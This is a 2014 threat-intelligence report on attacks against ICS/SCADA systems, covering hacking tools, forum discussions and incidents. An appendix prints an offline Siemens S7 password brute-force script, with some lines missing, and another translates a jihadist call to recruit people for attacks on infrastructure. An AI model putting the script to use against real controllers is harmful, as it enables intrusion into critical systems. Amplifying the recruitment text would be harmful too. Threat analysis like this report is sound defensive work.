Cyber Threats To SCADA Systems - Final

Cyber Threats to ICS/SCADA Systems
2014 SenseCy PO Box 8551, Poleg Netanya 4250711, Israel Tel +972-9-7482180 Israel info@sensecy.com
Cyber Intelligence Report Cyber Threats to

ICS/SCADA Systems
Executive Summary
Recent years have witnessed an increased awareness within the worldwide security community of
risks related to cyber attacks against critical infrastructures. ICS/SCADA systems have been a
particular cause of concern for the security community, owing to Stuxnet, Flame and other cyber
threats. As automation continues to evolve and assumes a more important role worldwide, the use
of ICS/SCADA systems is likely to increase accordingly.
In late August 2014, for example, over 300 companies in the oil and energy sector received a
warning from the Norwegian authorities regarding a large-scale hacker attack. The attack was
described as a spear-phishing attempt aimed at key personnel in the targeted companies, with the
goal of injecting a Trojan or virus into company systems.1
Additionally, in recent months numerous cyber security firms have conducted research into the
relatively new variants of Havex malware used to execute attacks against ICS and SCADA systems. By
attaching the malware to certain software available for download from ICS/SCADA manufacturer
websites, the attackers succeeded in compromising SCADA-related systems.2 And, in late September
2014 a new large-scale vulnerability, ShellShock, captured global attention as one of the most
prominent vulnerabilities discovered recently.
This research includes a comprehensive review of the SCADA field and recent significant incidents,
SCADA vulnerabilities and exploits. This report is based on the data collected from a variety of
sources, including cyber blogs, closed forums, platforms for uploading stolen and leaked
information, as well as social networks. These web searches focused on the key cyber arenas and
were conducted in Chinese, Russian, Persian, Arabic and English. The report is divided into three
main chapters:
1
2
Analysis of malicious tools and hacking methods
Discussions and trends on closed and password-protected forums
Reviewing SCADA-Related Cyber Incidents
http://www.newsinenglish.no/2014/08/27/oil-industry-under-attack-by-hackers/
http://securityaffairs.co/wordpress/26092/cyber-crime/cyber-espionage-havex.html
Table of Contents
Analysis of Malicious Tools and Hacking Methods ......................................................................... 4
Brute-Force Tool for PLC Component Siemens S-7.......................................................................... 4
ScadaScan Tool.................................................................................................................................... 5
PLCScan Tool ....................................................................................................................................... 6
SCADA Vulnerability Assessment Online Guide............................................................................ 6
Discussions and Trends on Closed and Password-Protected Forums .............................................. 8
Iranian Sources.................................................................................................................................... 8
Chinese Sources .................................................................................................................................. 9
Russian Sources................................................................................................................................. 10
Arabic Sources................................................................................................................................... 11
English Sources ................................................................................................................................. 14
SCADA-Related Cyber Incidents .................................................................................................. 16
New Vulnerability Poses Possible Threat to ICS and SCADA Systems .............................................. 16
What this Means ........................................................................................................................... 17
The Syrian Electronic Army Hacks into Israeli SCADA Systems ......................................................... 18
The Syrian Electronic Army (SEA).................................................................................................. 19
Iranian Hacker Group Implicates itself in Physical Attack on Electric Power Facility ....................... 22
Parastoo ........................................................................................................................................ 23
Jihadist Cyber Terror Group to Target SCADA Systems .................................................................... 24
Conclusion ................................................................................................................................. 26
Appendix 1 Brute-Force Tool Full Script.................................................................................... 27
Appendix 2 Technical Indicators for the SCADA-Related Tools .................................................. 29
Brute-Force Tool for S-7 .................................................................................................................... 29
ScadaScan ......................................................................................................................................... 29
PLCScan 29
Appendix 3: Full Translation of Yaman Mukhaddab's Message .................................................... 30
Analysis of Malicious Tools and Hacking

Methods
SenseCy operates numerous virtual entities over a range of web platforms, such as cyber blogs,
professional forums and closed hacking forums. This research includes searches for malicious tools
and hacking methods relevant to SCADA systems. Being a hot topic, the SCADA field is a major point
of interest for many hacker groups and individual hackers.
Designated room for SCADA hacking on a

hacking forum
SenseCy has identified several SCADA-oriented hacking tools, on both Iranian and Chinese hacking
forums.
Brute-Force Tool for PLC Component Siemens S-7

The first is a brute-force tool aimed at widespread PLC components Siemens S-7. The tool was
found on an Iranian hacking forum and is capable of executing a dictionary based brute-force attack.
The tool analyzes captured network traffic, divides it into sub-divisions, locates specific elements and
then executes a brute-force attack on them.
SenseCy contacted Siemens representatives and informed them about this tool. We received the
following reply:
..As a general security measure, Siemens recommends that asset owners configure the environment according
3
to our operational guidelines in order to run the devices in a protected IT environment and to avoid
unauthorized network captures.
We respectfully suggest that you check to confirm that Siemens operational guidelines4 are being
followed correctly and thus safeguard yourself from this exploit.
The hacking tool as presented on the forums (left); part of its script (right)
For the full tool script, please see Appendix 1.
ScadaScan Tool
A second tool, ScadaScan, was found on the Chinese hacking forum. This tool was written by Amol
Sarwate from Qualys and is similar to the tool mentioned above. It too, has brute-force capabilities,
along with an option to scan and locate protocols widely used in SCADA systems. The tool essentially
scans to locate Modbus and DNP protocols (over TCP). The script can be implemented as part of a
larger suite.
Screenshot of ScadaScan in action
http://www.industry.siemens.com/topics/global/en/industrialsecurity/Documents/operational_guidelines_industrial_security_en.pdf
4
Ibid.
PLCScan Tool
Another hacking tool found in the Chinese cyber arena is PLCScan. This is a scanning tool designed
to locate PLC devices based on IP range scan. It locates the IP and the relevant open ports on the
device. This tool supports S7 and Modbus protocols. For technical indicators based on our analysis
of the malicious tools, see Appendix 2.
SCADA Vulnerability Assessment Online Guide

One of our most interesting findings was an online guide titled: SCADA Vulnerability Assessment. This
guide, located on an Iranian hacking forum, is an extensive document (over 70 pages long) written in
Persian by two Iranian hackers and divided into four main chapters:
Introduction
Background of Critical Infrastructure Systems
The Different Parts in SCADA Systems
Industrial Control Systems (ICS)
Additional Background
Content Review
ICS and Critical Infrastructure
Protocol Layers Analysis
Modbus Protocol
Introduction to Fuzzing
Modbus Protocol Fuzzer
DNP3 Protocol
Security Assessment for ICS
Penetration Testing
Presenting the Devices used in our Experiments
Rapid Security Evaluation of ASATech RMU-2004 and DCM-2004
Cross Debugging and Cross Compiling
Reverse Engineering
Fuzzing Modbus TCP Protocol
Hardware Inspection
Additional Components and the Threat to Critical Systems
Example: Image of the Entire System
Security Assessment for Schneider Electric PLC
Example: Image of Firmware
Appendix 1: Proof of the Exploitability of ASATech Devices
Appendix 2: Modbus Fuzzer
Appendix 3: Virtual Portal of GSM Shield for Arduino
This guide reveals the tremendous interest in SCADA vulnerabilities and exploits, while displaying a
high level of understanding. This well-written document displays a significant degree of proficiency
on this particular subject. The structure and depth of the information, the level of details and the
description implies that a considerable amount of time was invested in it. This is without a doubt a
great guide and starting point for a beginner and even a specialist in the SCADA world.
The full document will be delivered to the client upon request.
Online guide cover
POC exploit code against ASATech Devices
Discussions and Trends on Closed and

Password-Protected Forums
It is common knowledge that in recent years, SCADA has become one of the most-discussed topics in
the cyber world. This chapter reviews the practice of SCADA-related topics in the arenas covered in
this report Iranian, Chinese, Russian, Arabic and English.
Iranian Sources
Iran is without doubt a hotspot for SCADA enterprises, both from an academic frame of reference, in
addition to more sinister motivating factors, such as hacking and vulnerability exploitation. As
mentioned, some hacker forums have designated rooms for SCADA hacking discussions, while some
individual hackers are more SCADA-oriented than others. One example of such a hacker is Pouriya
Naseri, who goes by the alias NOTER, and is affiliated with the Iranian DataCoders hacker group. One
document written by Naseri is titled Electo Hack and it comprises three sections:
Basic Information about Electronic & Electrical Controllers
Example for an Attack (Electro Hack)
Basic Information about Vulnerability of PLC & SCADA
Introductory explanation about SCADA protocols
Introductory explanation regarding a SCADA exploit
The full document written by Naseri will be delivered to the client upon request.
Chinese Sources
Unlike hacker forums in other arenas, no dedicated rooms for SCADA were found on Chinese hacker
forums. Discussions about SCADA-related issues are usually held in rooms with general designations,
such as "Software Security". Most SCADA-related content is either translated to Chinese from
English sources or directly quoted from the official sites of the manufacturers (for example warnings
against newly uncovered vulnerabilities).
An article about the Havex virus

translated from English
There are several professional Chinese sites dedicated solely to SCADA. These sites typically feature
discussion rooms, news reports, downloading areas, and articles and products for sale. In the
discussion section, separate rooms are established for various SCADA components and different
manufacturers such as Siemens, AB and Schneider. The information exchanged on these platforms is
mostly professional or educational, and the forum members occasionally share vulnerabilities as
published by the official manufacturers or by the US-CERT.
Example of different
discussion rooms
Even though we did not find a Chinese hacking blog dedicated entirely to SCADA, some blogs do
publish SCADA-related articles and tools. Two of these tools were described above in the Malicious
Tools and Hacking Methods chapter:
ScadaScan
PLCScan
Russian Sources
While monitoring Russian sources, SenseCy identified mostly open source reports dealing with
SCADA vulnerabilities5 and analyses of major incidents in the SCADA field from the last few years,
such as the Havex malware and Stuxnet.
One example of such a report was published in June 2014 by the Russian security company USSC
(Ural Center for System Security). This report reviewed the Havex Trojan for SCADA systems, relying
mostly on English sources.6
Screenshot from the Russian report about the Havex Trojan
In addition, we identified several closed forums dedicated to SCADA discussions addressing mostly
technical topics, rather than harmful activity. The members of these forums are professionals who
work in the industry and often discuss different aspects of ICS systems.7
http://internetua.com/kriticseskie-uyazvimosti-v-SCADA-pozvolyauat-hakeram-polucsit-kontrol-nadpromishlennimi-sistemami
6
http://www.ussc.ru/articles/id/19
7
www.Asutpforum[.]ru/viewtopic.php?f=104&t=4302&start=75
10
A discussion from a professional SCADA forum about protecting a work

station with ICS systems installed on it
It is important to note that the Russian underground is primarily devoted to financial scams that can
turn easy profits. Russian underground players appear less concerned with attacking SCADA systems
and are more interested in making a profit. While we cannot underestimate the capabilities of
Russian hackers in impairing SCADA systems, such plans would most likely not be discussed on
accessible web platforms.
Arabic Sources
Since 2013, Arab hackers have become more and more involved in the global petroleum Industry. In
June 2013, the infamous hacker group AnonGhost launched a hacktivist operation titled #OpPetrol, a
cyber-campaign targeting the petroleum industry around the world. The group's official target list
includes companies such as the Saudi Arabian Aramco, British Petroleum in the U.K. and Texaco in
the U.S.
An announcement on the official AnonGhost Twitter account
The #OpPetrol operation is responsible for defacements of the websites of petroleum companies
and the leakage of valuable data such as usernames, passwords and personal details.
11
However, security experts are often more concerned about advanced hackers who could
compromise SCADA systems or ICS in the petroleum industry.8
Discussions pertaining to SCADA-related topics from Arabic sources focus on the importance of
SCADA systems and the significant damage that could result if these systems were to be
compromised in an operation like #OpPetrol.
SCADA systems are mentioned on white hat platforms as well. One such platform is a Facebook page
titled "Teaching Hack for Arabs" that promises to teach people how to hack SCADA systems and
other control systems in order to become security experts.9
A post from a Facebook page about teaching SCADA hacking
Another example of SCADA hacking practices is a tweet posted on December 3, 2013 by Abdulla elAly, a Kuwaiti information security (IS) expert and CEO of Cyberkov Ltd. This tweet comments on
hacking SCADA as part of a course at a black hat conference. El-Aly uploaded a picture of the various
tools that he uses to hack the system.10
https://blog.cyberkov.com/?s=%D8%B3%D9%83%D8%A7%D8%AF%D8%A7
https://www.facebook.com/pages/Teaching-Hack-For-ofArabs/323714387692923?sk=app_106171216118819
10
https://twitter.com/3bdullla/status/275698599789211648; https://twitter.com/3bdullla
9
12
Tweet by a Kuwaiti IS expert on

SCADA hacking
Another forum discussion thread about SCADA was started on September 25, 2013 on the Arabic
forum, Dev-Point, a platform dedicated mostly to developers discussions. Hacker al-Basra al-Iraqi
inquired about ways to hack SCADA systems. Another hacker called SkAnDeR X replied that he had
never heard of any hacker who had succeeded in breaching SCADA systems but he hoped that
someone would do so in the future. A third hacker named al-Safah provided detailed technical
information about SCADA systems and claimed that a simple computer with BackTrack Linux
distribution created for penetration testing was insufficient for hacking a SCADA system. A hacker
named Black Ghost claimed that there were many ways to hack SCADA systems, by exploiting its
vulnerabilities for instance. He also mentioned that in 2011, a vulnerability was identified in
KingView SCADA software and exploited via Metasploit. Moreover, he claimed that SCADA systems
could be hacked by radio waves, a method requiring close proximity to the system. Another hacker
with the alias Muslim Aqeel provided a link to VUPEN Security Researchs11 "7T Interactive Graphical
SCADA Systems (IGSS) Remote Memory Corruption" from May 24, 2011.12
Another source for SCADA-related topics is military forums. In January 2014, a review about PLC with
an emphasis on traffic systems13 was posted on the Arabic-Military forum.
11
www.seclists.org/bugtraq/2011/May/168; www.vupen.com/english/research.php
www.dev-point[.]com/vb/t431641.html
13
http://www.arabic-military[.]com/t90369-topic
12
13
Screenshot of a PLC review on the Arabic-Military forum
In conclusion, the information accumulated from Arabic sources is mostly general, with references
to SCADA vulnerabilities, but with no actual tools or detailed methods for hacking SCADA systems or
endangering critical infrastructure systems.
English Sources
Throughout our research, we noticed a large variety of discussions on the topic of SCADA. Most
discussions revolved around theoretical attacks of critical infrastructures,14 where users discussed
the implications and complexities of attacking large organizations and strictly supervised
infrastructures. Few forum threads showcased security holes discovered by forum members in
critical infrastructure software and hardware. However, most of the showcased vulnerabilities were
published by major security firms.
Critical infrastructures companies were mentioned on a platform commonly used by hackers for
leaking sensitive information and target lists.15
A list of IPs posted on Pastebin
On another Pastebin upload from 2013, organizers called on participants to use DDoS tools to attack
governmental and major corporate websites.16 Several malware developers even offered their
customized DDoS tools, designed specifically to take down carefully monitored and powerful servers.
14
http://www.garage4hackers[.]com/showthread.php?t=2431
http://pastebin.com/bHvn7rwe
16
http://pastebin.com/Bqak4Mjm
15
14
In addition to the Pastebin upload, SenseCy identified a post on a closed forum reviewing an exploit
found at a U.S. water power plant. This exploit is being offered online by the hacker who created it.
He showcased screenshots of the system interface, as well as his mail discourse with the Industrial
Control Systems Cyber Emergency Response Team (ICS-CERT) in the course of which CERT expressed
great interest in the exploits capabilities.17
Screenshots of the SCADA control panels taken by the hacker as proof
One vulnerability disclosed in another discussion on this closed forum was an unauthorized access
vulnerability that affects many SCADA systems and remote Netgear. The vulnerability is used to
brute-force on HTTP login panels and its exploitation is explained in a step by step guide.18
The hackers proof of concept for his exploitation

of the vulnerability
17
18
http://www.alboraaq[.]com/forum/showthread.php?t=269076
http://www.alboraaq[.]com/forum/showthread.php?t=381388
15
SCADA-Related Cyber Incidents

New Vulnerability Poses Possible Threat to ICS and SCADA
Systems
In late September 2014, ShellShock, a new large-scale vulnerability captured global attention as one
of the most prominent vulnerabilities discovered recently.19
Shellshock or Bashdoor, after the Unix Bash shell it takes advantage of, is especially relevant for
Unix-based OS, such as Linux and Apples OS X. Apple, for its part, addressed the news about this
vulnerability and clarified that the vast majority of OS X users are safe and that Apple will soon
release a security update for users who configure advanced UNIX services and might be vulnerable
to this security flaw.20
One of the major issues with this vulnerability, described by some as Bigger than Heartbleed,21 is
its possible effect on SCADA systems and ICS (Industrial Control System).22 According to different
publications, well-needed security updates may not even be available for such systems running
unsupported versions of Linux. In addition, many ICSs outlive the manufacturers recommended
lifespan.23 Moreover, multiple firms and corporations have warned their customers of the possible
threat this new vulnerability poses, listing unpatched and vulnerable products.24
Other than various news items about Shellshock, SenseCy identified several references to this newly
discovered vulnerability on different hacking forums. One example is an Iranian hacking forum
where members posted detailed explanations on this vulnerability.
19
http://www.slate.com/articles/technology/technology/2014/09/shellshock_what_you_need_to_know_about
_the_bash_vulnerability.html
20
http://www.macworld.com/article/2687826/apple-says-most-mac-users-are-safe-from-shellshock-bashbug-promises-quick-fix.html; http://krebsonsecurity.com/2014/09/apple-releases-patches-for-shellshock-bug/
21
http://www.pcworld.com/article/2687857/bigger-than-heartbleed-shellshock-flaw-leaves-os-x-linux-moreopen-to-attack.html
22
http://www.v3.co.uk/v3-uk/analysis/2372312/bash-shellshock-bug-puts-servers-scada-and-web-world-atrisk
23
http://news.softpedia.com/news/Industrial-Control-Systems-Equipment-Difficult-to-Patch-AgainstShellshock-Bug-460061.shtml
24
http://articles.economictimes.indiatimes.com/2014-09-27/news/54377111_1_solaris-bug-products;
http://news.softpedia.com/news/New-Remote-Code-Execution-Flaws-Found-In-Shellshock-Patched-Bash460348.shtml
16
Forum post detailing related scripts
What this Means

The vast majority of critical system management runs on some version of UNIX or Linux. In most
cases, it is a specially designed version and the organizations do not know how to patch it (if it is
even available), and in worst-case scenarios, the vendor does not provide any updates or patches for
the systems, specifically because of its uniqueness. This particular vulnerability is so fundamental
that it can provide access to critical assets with minimum effort. This powerful exploit can enable an
attacker to execute arbitrary commands on the system.
Even more worrisome is the fact that immediately following the release of Shellshock, more
implementations and variants of this vulnerability (Bash-related) were found. There are already
indications of various bots using this vulnerability. And if we take into consideration that the bug
dates back to the initial versions of bash, we can only speculate where it will end, if at all.
17
The Syrian Electronic Army Hacks into Israeli SCADA Systems

On May 6, 2013 the cryptome.org website reported a successful attack by the "Syrian Electronic
Army" (SEA) on a strategic Israel infrastructure system in Haifa. In an email sent to the website, the
attack was declared to be a warning to decision-makers in Israel, evoking alleged Israeli Air Force
(IAF) attacks on Syrian territory at the beginning of May 2013. The claim of responsibility for the
attack was accompanied by a .pdf file with screenshots substantiating the cyber attack.25
Examination of the screenshots proved that the attack was authentic, but was not aimed at a Critical
National Infrastructure (CNI) like the municipal water SCADA system in Haifa. Our research did,
however, reveal that the attackers had targeted the irrigation control system of Kibbutz Sa'ar, near
Nahariya. Control of this system would present the hacker with numerous capabilities, among which
is the destruction of the agricultural yield.
Screenshot from the PDF released by the attackers
We also noticed that the time shown on the screenshot indicated the end of April 2012. It is possible
that the system clock was incorrectly set, but it is more likely that the system was breached a year
ago and the published Retaliatory Strike was retained as a contingency plan for exactly such an
attack by Israel.
The Syrian Electronic Army posted a denial via its Twitter account, where it stated that it was not
behind the attack.26 On other occasions, this Twitter account has been used as a platform for claims
of responsibility, but with this incident, the above attack is not mentioned, neither here nor on the
groups official website or forums (apart from the denial). It should be noted that there are
numerous examples of fictitious claims of responsibility intended to deflect identification of the
attacker MO (Modus Operandi) of state-sponsored hacker groups.
25
26
http://cryptome.org/2013/05/sea-haifa-hack.htm, http://pastebin.com/aRCHLeRr
https://twitter.com/Official_SEA12/status/332172497397088256
18
SEA denial on their Twitter account
This incidence is another link in a chain of events demonstrating an impressive ability to locate and
exploit SCADA systems that appear to be susceptible to the Muslim hackers skills. However, in our
view, this event is unprecedented. For the first time in public, a critical computerized infrastructure
facility on Israeli soil has been attacked, and it is extremely likely that a sovereign state is behind the
attack, declaring outright war in the cyber arena and deviating from the intelligence-gathering
plateau.
The Syrian Electronic Army (SEA)

The Syrian Electronic Army (SEA), a group of hackers working in support of Syrian President Bashar
al-Assad, first emerged in mid-2011 during the first Syrian uprisings, when it started attacking a wide
array of media outlets. Its campaign includes DDoS attacks, phishing, pro-Assad defacements and
spamming against governments, online services, and media organizations that are perceived hostile
to the Syrian government.27 The SEA's primary goal is to improve the Syrian government's image and
target its opponents and critics.
Notable Activities
To date, the SEA has successfully targeted Associated Press (AP), CNN, BBC, Daily Telegraph,
Financial Times, Guardian, The Washington Post, The New York Times, and more. Its most famous
operation was an announcement via AP's Twitter account according which the White House was
bombed and President Obama injured. The tweet caused the stock market to briefly dip more than
$100 billion dollars.28
27
http://www.fireeye.com/blog/technical/cyber-exploits/2013/07/syrian-electronic-army-hacks-major-communicationswebsites.html
28
http://www.vice.com/read/the-syrian-electronic-army-almost-crashed-the-dow-jones
19
The drop in the DOW Jones after the SEA's Obama tweet
In May 2013, the cryptome.org website reported a successful attack by the SEA on a strategic Israel
infrastructure system in Haifa. Examination of the screenshots proved that the attack was authentic,
but was not aimed at a Critical National Infrastructure (CNI) like the municipal water SCADA system
in Haifa. Our research did, however, reveal that the attackers had targeted the irrigation control
system of a Kibbutz 30km north of Haifa. Nevertheless, it proves their growing capability and may
indicate a cooperation of the group with other state actors in the region.
Methods of Operation
The SEA is very active on social media networks, including Twitter, Facebook, Google+, YouTube,
Instagram, Pinterest, and smartphone apps. The group also runs an official website, SEA.sy, where it
appeals for volunteers to promote and aid its cause using social media.29 The group often sends
socially-engineered spear-phishing emails to lure the victim into opening weaponized and malicious
documents.30
29
30
http://www.memri.org/report/en/0/0/0/0/0/0/7357.htm
http://www.theregister.co.uk/2013/08/01/sea_analysis/
20
SEA's Twitter account (left); "Volunteering in the SEA" (right)
Summary
The SEA's exact relationship to the Syrian regime remains unclear. We believe however that the
group is not just working in support for the Syrian government, but rather operating under its orders
and guidance. In any case, recent months have proven that the SEA has emerged as a much more
serious threat not only to media outlets but also to government agencies, corporations and perhaps
even critical infrastructure systems around the world.
Having said that, it is important to emphasize that currently the group does not have the capabilities
to cause the damage that nation-state actors like China, Russia and even Iran hold.
In a scenario involving an American strike on Syria, we expect that the SEA will retaliate and wage
perhaps with the help of state-sponsored Iranian hacker groups cyber attacks against U.S. and
Western targets, such as media organizations, financial institutions, government entities and critical
infrastructure systems.
21
Iranian Hacker Group Implicates itself in Physical Attack on

Electric Power Facility
On January 2, 2014, the Cryptome.org website (a digital library host) published a message from the
Iranian hacker group "Parastoo", directed at the American authorities. The message headline
connects the group to a "military-style" attack on an electric power station, the PG&E Metcalf
substation, in California, U.S.A. on April 16, 2013. The connection to the Iranian group is unclear,
despite the fact that Parastoo has mentioned that it has been testing national critical infrastructures
using cyber vectors.31
Cryptome message
On April 16, 2013, an undetermined number of individuals breached the PG&E Metcalf power
substation in California and cut the fiber-optic cables in the area around the station. The act
neutralized some local 911 services and temporarily disrupted cell phone service in the area. The
perpetrators also fired shots from high-powered rifles at several transformers in the facility. Ten
were damaged and several others shut down.
Despite the fact that the attack is being treated as vandalism, the FBI has taken over the case. There
appears to have been some initial concern, or at least interest, in the fact that the shooting occurred
one day after the Boston Marathon attacks. But according to the FBI, there is no evidence at this
time relating the attack to terrorism.32
31
http://cryptome.org/2014/01/parastoo-pge-metcalf.htm
http://complex.foreignpolicy.com/posts/2013/12/24/power-station-militaryassault#sthash.EpAunaEs.8OPXCTqS.dpbs, http://www.dailymail.co.uk/news/article-2530879/FBI-investigatesmilitary-style-attack-California-power-station.html
32
22
It should be noted that there have been several attacks against different infrastructure facilities in
the U.S. in the past year, such as the Arkansas power grid. Furthermore, officials conceded that the
electric power industry is focusing on the threat of cyber attacks.33
Parastoo
The Iranian hacker group Parastoo34 first emerged on November 25, 2012, when they posted a
message announcing they hacked into the International Atomic Energy Agency (IAEA) and leaked
personal details of its officials.35
In February 2013, Parastoo claimed to have stolen nuclear information, credit card information, and
the personal identities of thousands of customers, including individuals associated with the U.S.
military, that work with IHS Inc., a global information and analytics provider.36
Operation Roohollah Parastoo claims to have hacked into IHS Inc.
In March 2013, several weeks prior to an April 7 anti-Israeli cyber operation, Parastoo announced
that they would demonstrate "a new generation of APT on political, social, financial cyber entities"
during the upcoming #OpIsrael campaign.37 The campaign itself included mostly DDoS, defacement
and SQLi attacks on official and private Israeli websites. We have found no evidence of using APT
tools during this cyber operation.
33
http://complex.foreignpolicy.com/posts/2013/12/24/power-station-militaryassault#sthash.EpAunaEs.8OPXCTqS.dpbs, http://www.dailymail.co.uk/news/article-2530879/FBI-investigatesmilitary-style-attack-California-power-station.html, http://www.nytimes.com/2013/10/09/us/power-grid-isattacked-in-arkansas.html?_r=0

34
Parastoo means swallow (the bird) in Persian.
35
http://cryptome.org/2012/11/parastoo-hacks-iaea.htm, http://pastebin.com/SdYaPUwr
36
http://cryptome.org/2013/02/parastoo-janes-cbrn.htm, http://freebeacon.com/anti-israel-hackingcollective-strikes-again/, http://wikileak.ir/en/leaks/13
37
http://cryptome.org/2013/03/parastoo-mt-apt.htm
23
On July 3, 2013, Parastoo claimed to have launched a UAV flight on U.S. soil.38 Several days later,
they published a short, mysterious video featuring allegedly documenting a UAV watching a U.S.
aircraft carrier.39
We do not have any information regarding the members of the group, but we believe this to be an
anti-American and anti-Israeli hacker group, likely supported by the Iranian regime like other Iranian
groups.
Jihadist Cyber Terror Group to Target SCADA Systems

On June 11, a prominent Web Jihadist from the Shumukh al-Islam forum, Yaman Mukhaddab,
launched a campaign to recruit male and female volunteers for a new Electronic Jihad group. The
campaign, which takes place over the thread itself, begins with a clear definition of the groups tasks
and priorities. Mukhaddab says:40
Simply put, it is a cyber-terror base, for launching electronic terror attacks on major infidel
powers, specifically the U.S., the U.K. and France, no others. This base is not going to attack,
for instance, the sites of Shia, Christians, apostates, slanderers, liar sites and forums or
anything else. I repeat: it will only target the U.S., the U.K. and France.
Mukhaddab goes on to list the main targets for future attacks. SCADA systems are ranked as a top
priority target, in order to destroy power, water and gas supply lines, airports, railway stations,
underground train stations, as well as central command and control systems in these three
38
http://cryptome.org/2013/07/parastoo-uav-launch2.htm
http://www.hongpong.com/archives/2013/07/07/mysterious-parastoo-apparent-iranian-hacker-groupclaims-uav-flight-inside-usa-r, http://www.youtube.com/watch?v=lmuScdQPMFc&feature=player_embedded
40
See Appendix 3 for a full translation of Mukhaddabs message.
39
24
countries. The second priority includes control systems of general financial sites, such as central
savings organizations, stock markets and major banks. Third on the groups agenda are websites and
databases of major corporations dominating the economies of these countries, while fourth and last
are less specified public sites affecting the daily routine of citizens, in order to maximize the terror
effects on the population.
Mukhaddab details the desired skills of anyone wishing to join the group, including: thorough
understanding of SCADA systems, preferably with experience in hacking them; acquaintance with
writing hacking programs and scripts, and programming in C, C+ and C++ languages; expertise in
networks, communication protocols and various kinds of routers and firewalls, specifically
mentioning CISCO; Expertise in Linux or Unix operating systems; expertise in Windows operating
system; capability of detecting security vulnerabilities; acquaintance with hacker websites, capability
of entering them easily, searching for required scripts, tools, or software, and providing them to
fellow members, if asked to; complete mastery of English or French scientific language, and scientific
background in computer engineering; mastery of the Russian language; and mastery of the Chinese
language. Members who want to volunteer are asked to post a response in the thread, specifying
the categories that fit their capabilities.
To date, close to a hundred volunteers have already signed on to Mukhaddabs Electronic Jihad
group. We have yet to see indications that this newly formed group has started to engage in online
hacking activity, but given the enthusiasm it created among forum members, this is likely to occur in
the near future.
25
Conclusion
The purpose of this report is to provide a thorough review of the SCADA field in major cyber arenas.
This report included information regarding malicious tools and methods for hacking SCADA systems
and a review of major cyber arenas and the practice of SCADA-related topics.
The report included and analysis of hacking tools for SCADA systems found on Chinese and Iranian
closed forums. It is clear that the SCADA field as whole, as well as relevant vulnerabilities and
exploits, are of great interest to Chinese and Iranian hackers. The report also covered discussions on
closed hacking forums and the review of significant SCADA-related cyber incidents.
Generally speaking, we can attest that the world of SCADA hacking is becoming more and more
accessible to hackers from around the world, from Hacktivists to Cyber Criminals. In our mind, both
the vendors and the users should take into account that in the next two years, the amount of
probing and research done on SCADA systems is going to be as prolific as vulnerability research on
desktops and mobile systems.
26
Appendix 1 Brute-Force Tool Full Script

"""
File: s7-brute-offline.py
Desc: offline password bruteforsing based on challenge-response data,
extracted from auth traffic dump file
import sys
import hashlib
import hmac
from binascii import hexlify
try:
from scapy.all import *
except ImportError:
print "please install scapy: http://www.secdev.org/projects/scapy/ "
sys.exit()
cfg_pcap_file = '/root/siemens/RE_S7/stop_cpu_cmd_right_pass_123.pcap'
cfg_dictionary_file = 'dict.txt'
def get_challenge_response():
r = rdpcap(cfg_pcap_file)
lens = map(lambda x: x.len, r)
pckt_lens = dict([(i, lens[i]) for i in range(0,len(lens))])
# try to find challenge packet
pckt_108 = 0 #challenge packet (from server)
for (pckt_indx, pckt_len) in pckt_lens.items():
if pckt_len+14 == 108 and hexlify(r[pckt_indx].load)[14:24] ==
'7202002732':
pckt_108 = pckt_indx
break
# try to find response packet
pckt_141 = 0 #response packet (from client)
_t1 = dict([ (i, lens[i]) for i in pckt_lens.keys()[pckt_108:] ])
for pckt_indx in sorted(_t1.keys()):
pckt_len = _t1[pckt_indx]
'7202004831':
pckt_141 = pckt_indx
break
# try to find auth result packet
pckt_84 = 0 # auth answer from plc: pckt_len==84 -> auth ok
pckt_92 = 0 # auth answer from plc: pckt_len==92 -> auth bad
for pckt_indx in sorted(_t1.keys()):
pckt_len = _t1[pckt_indx]
'7202000f32':
pckt_84 = pckt_indx
break
27

'7202001732':
pckt_92 = pckt_indx
break
print "found packets indeces: pckt_108=%d, pckt_141=%d, pckt_84=%d,
pckt_92=%d" % (pckt_108, pckt_141, pckt_84, pckt_92)
if pckt_84:
print "auth ok"
else:
print "auth bad. for brute we need right auth result. exit"
sys.exit()
challenge = None
response = None
raw_challenge = hexlify(r[pckt_108].load)
if raw_challenge[46:52] == '100214' and raw_challenge[92:94] == '00':
challenge = raw_challenge[52:92]
print "found challenge: %s" % challenge
else:
print "cannot find challenge. exit"
sys.exit()
raw_response = hexlify(r[pckt_141].load)
if raw_response[64:70] == '100214' and raw_response[110:112] == '00':
response = raw_response[70:110]
print "found response: %s" % response
else:
print "cannot find response. exit"
sys.exit()
return challenge, response
def calculate_s7response(password, challenge):
challenge = challenge.decode("hex")
return hmac.new( hashlib.sha1(password).digest(), challenge,
hashlib.sha1).hexdigest()
if __name__ == '__main__':
print "using pcap file: %s" % cfg_pcap_file
challenge, response = get_challenge_response()
print "start password bruteforsing ..."
for p in open(cfg_dictionary_file):
p = p.strip()
if response == calculate_s7response(p, challenge):
print "found password: %s" % p
sys.exit()
print "password not found. try another dictionary."
28
Appendix 2 Technical Indicators for the

SCADA-Related Tools
Brute-Force Tool for S-7
Tool Type: Brute-force
Tool Size: 3.3 KB
MD5: ea2ce25bed88468509f75801a03ad4a7
ScadaScan
Tool Type: Scanner, brute-force
Tool Size: 3,908 bytes
MD5: ac0ebc8b18b98639a1b1d8531db17cb2
PLCScan
Tool Type: Scanning tool
Tool Size: 3,093 bytes
MD5: be7d53a8992ba11aa715b2c9b664054f
29
Appendix 3: Full Translation of Yaman

Mukhaddab's Message
Honestly speaking: we need male and female terrorists to start a new al-Qaeda base. This is
serious, so we wish for everyone to view it
In the Name of Allah, the Most Compassionate and Merciful
[]
Without any unnecessary introductions: it is not a joke! We need male and female terrorists, in
order to start a new al-Qaeda base which can only be started after we make sure we have the
necessary number of personnel.
Later on we will present the tasks and objectives of this base, followed by the general requirements
of the terrorists, followed by the categories of expertise required of the terrorists needed.
Whoever reads this thread and wants to volunteer must meet just two requirements:
Absolutely consent to the general requirements.

Choose the field fitting ones capabilities, without the slightest exaggeration. In case of any
doubt, it is better if one underestimate ones capabilities, since an overestimation may be
disastrous, resulting in the failure of great operations and a fellow members efforts.
Whoever cannot meet the general requirements, or finds no field fitting his capabilities, I kindly ask
him to only pray for his fellows, taking no part in this project, no matter how enthusiastic he may be
about it. He may have many other ways to support jihad and jihadists. This is to make this thread
focused and easy to check, and to allow the advance to the next stage, by Allahs will.
I ask whoever reads the thread not to be amazed at or complain about the public manner in which
we decided to make this address, and not advise us to keep it secret. If secrecy was of any use, we
would not have resorted to publicity. We need, first of all, to make sure we have the necessary
number of male and female volunteer terrorists meeting the requirements, and this can only be
done publicly.
